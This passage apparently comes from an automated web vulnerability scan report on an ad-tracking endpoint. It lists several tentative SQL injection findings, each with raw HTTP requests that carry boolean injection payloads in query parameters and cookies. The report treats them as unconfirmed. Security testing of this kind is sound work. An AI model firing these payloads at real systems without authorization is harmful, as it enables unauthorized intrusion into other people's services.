User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; cd=false'%20and%201%3d2--%20; dq=9|1|8|0; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=441745.js^1^1291762372^1291762372

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:18 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.124. http://tap.rubiconproject.com/oz/sensor [cd parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The cd parameter appears to be vulnerable to SQL injection attacks. The payloads 11807099'%20or%201%3d1--%20 and 11807099'%20or%201%3d2--%20 were each submitted in the cd parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false11807099'%20or%201%3d1--%20&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:01 GMT; Path=/
Set-Cookie: dq=16|1|15|0; Expires=Thu, 08-Dec-2011 00:32:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false11807099'%20or%201%3d2--%20&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.125. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:51 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:51 GMT; Path=/
Set-Cookie: dq=11|1|10|0; Expires=Thu, 08-Dec-2011 00:32:51 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=46&k=gift+wrapping:160,christmas+past:144,gift+bags:88,gift:85,past+contracostatimes:80,contra+costa:72,mom's+5:64,mom+makes:64,local+mom:64,costa+times:64,card+debt:64,5+wrinkle:64,6762+month:64,makes+6762:64,credit+card:64,banks+forced:64,wrinkle+trick:64,houston+mom's:64,forgive+credit:64,wrapping+service:56,wrapping:50,cars+homes:40,el+cerrito:40,albany+hot:40,bay+area:40,walnut+creek:40,richmond+jobs:40,times+antioch:40,apartments+el:40,greener+times:40,creek+richmond:40,concord+walnut:40,cerrito+albany:40,wrapping+falls:40,homes+apartments:40,brentwood+concord:40,antioch+brentwood:40,past+contracostatime:40,jobs+cars:40,christmas:36,&t=Ghost+of+Christmas+past+-+ContraCostaTimes.com&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; khaos=GFEPV6UK-2-91QT; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%262372%3D1%264894%3D1%264212%3D1%265446%3D1; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; cd=false; dq=10|1|9|0; rdk9=0; csi9=3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:51 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.126. http://tap.rubiconproject.com/oz/sensor [put_1986 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1986 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1986 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d1--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 01:28:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: dq=17|1|16|0; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 01:28:02 GMT; Path=/
Set-Cookie: lm="8 Dec 2010 01:28:02 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=; rdk9=0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1185=9222939536171538409; au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; khaos=GFEPV6UK-2-91QT; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; rdk=5833/7750; put_2081=CC-00000000320688809; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; put_1512=%5Bnil%5D; put_1986=1253520181866309356'%20and%201%3d2--%20; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk2=0; dq=16|1|15|0; put_1994=13371vxjy3fi8; cd=false;

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 01:28:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.127. http://tap.rubiconproject.com/oz/sensor [put_1994 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1994 cookie appears to be vulnerable to SQL injection attacks. The payloads 19221418'%20or%201%3d1--%20 and 19221418'%20or%201%3d2--%20 were each submitted in the put_1994 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi819221418'%20or%201%3d1--%20; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:22 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:22 GMT; Path=/
Set-Cookie: dq=16|1|15|0; Expires=Thu, 08-Dec-2011 00:32:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=58&k=san+jose:236,mercury+news:192,jose+mercury:160,news:86,mercury+new:80,30+worth:64,rosies+posies:64,newspaper+delivery:64,jose:59,shopping:54,new:43,news+breaking:40,silicon+valley:40,breaking+news:40,local+events:40,mercury:40,high+speed:40,chrome+os:40,bay+area:40,news+silicon:40,rosies+posie:32,biz+break:32,speed+rail:32,santa+clara:32,clara+county:32,san+francisco:32,os+notebook:28,area+living:24,real+estate:24,los+gatos:24,site+map:24,google+chrome:24,notebook+nothing:24,elizabeth+edwards:24,subscriber+services:24,chrome+o:20,local+event:20,breaking+new:20,high:16,flowers:16,&t=Home+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi819221418'%20or%201%3d2--%20; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1; cd=false; dq=15|1|14|0; csi9=2617283.js^1^1291762442^1291762442&441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; ruid=254cb0a61dae79de123c116f^7^1291762640^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; rdk=5833/7750; rdk2=0; csi2=3181577.js^3^1291762417^1291762640&3137272.js^3^1291762416^1291762420&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:22 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.128. http://tap.rubiconproject.com/oz/sensor [rpb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=31&k=mercury+news:176,san+jose:160,news:158,rss+feed:136,rss+feeds:128,mercury+new:88,rss+san:80,columns:80,jose+mercury:80,special+reports:80,new:79,rss+terms:64,life+style:64,find+us:64,local+news:64,news+video:64,food+dining:64,video:64,sports+video:64,entertainment+video:64,company+news:64,mobile+device:64,college+teams:64,follow+us:64,business+video:64,opinion+editorial:64,feed:59,sports:48,twitter:48,mercury:44,jose:40,real+simple:40,syndicate+feeds:40,business:40,column:40,simple+syndicate:40,rss+real:40,news+rss:40,feeds:34,access:32,&t=RSS+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/rss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1'%20and%201%3d1--%20; rdk9=1; csi9=441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=3137272.js^3^1291762416^1291762420&3181577.js^1^1291762417^1291762417&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; cd=false; dq=13|1|12|0

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:34 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:34 GMT; Path=/
Set-Cookie: dq=14|1|13|0; Expires=Thu, 08-Dec-2011 00:32:34 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

